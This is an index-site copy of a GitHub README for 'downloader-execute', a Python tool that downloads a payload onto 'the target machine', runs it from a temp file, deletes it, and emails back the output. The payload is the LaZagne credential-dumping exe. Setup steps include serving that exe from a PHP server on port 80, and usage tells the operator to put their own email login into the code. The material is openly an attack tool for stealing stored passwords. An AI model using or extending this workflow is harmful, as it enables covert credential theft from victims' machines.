An open API service indexing awesome lists of open source software.

https://github.com/lascc/downloader-execute

Send output in a mail for the LaZagne Project
https://github.com/lascc/downloader-execute

Last synced: 28 days ago
JSON representation

Send output in a mail for the LaZagne Project

Awesome Lists containing this project

README

          

# Download and execute any files on the target machine

- Download the payload put him in a temp file, execute, remove.

# Tech part

This script uses a number of open source projects to work properly:

- LaZagne Project
- subprocess
- tempfile
- smtplib
- requests
- python

### Installation

```
Download the LaZagne Project exe > https://github.com/AlessandroZ/LaZagne/releases
Upload the exe with a php server for exemple : php -S 0.0.0.0:80 -T /Users/root/Desktop
```

### Usage

```
Add your email address and your password in the code at the line 24.
```

### Pictures

[![N|Solid](https://i.imgur.com/85gkCsZ.png)](https://i.imgur.com/85gkCsZ.png)

@LasCC